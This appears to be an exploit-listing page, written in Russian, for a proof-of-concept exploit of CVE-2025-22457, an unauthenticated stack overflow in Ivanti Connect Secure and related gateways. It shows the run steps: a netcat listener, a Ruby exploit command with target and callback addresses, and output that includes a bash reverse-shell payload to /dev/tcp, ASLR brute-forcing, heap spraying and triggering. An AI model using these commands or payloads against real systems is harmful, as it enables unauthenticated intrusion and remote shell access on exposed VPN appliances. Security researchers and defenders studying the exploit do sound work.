## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TRONE-UX-CVE-2025-22457
# PoC для CVE-2025-22457
_Уязвимость переполнения буфера стека без аутентификации, затрагивающая Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure и ZTA Gateways_
## Обзор
Это proof-of-concept эксплойт для демонстрации эксплуатации CVE-2025-22457. Полный технический анализ уязвимости и стратегии эксплуатации см. в анализе Rapid7 по ссылке:
https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis
## Использование
Мы можем запустить этот скрипт против уязвимой цели Ivanti Connect Secure версии 22.7r2.4 следующим образом:
Запустите netcat слушатель для получения обратной оболочки.
root@kitploit:~
C:\>ncat -lnvkp 8080
Запустите эксплойт с перебором ASLR (это будет медленно).
root@kitploit:~
C:\>ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering..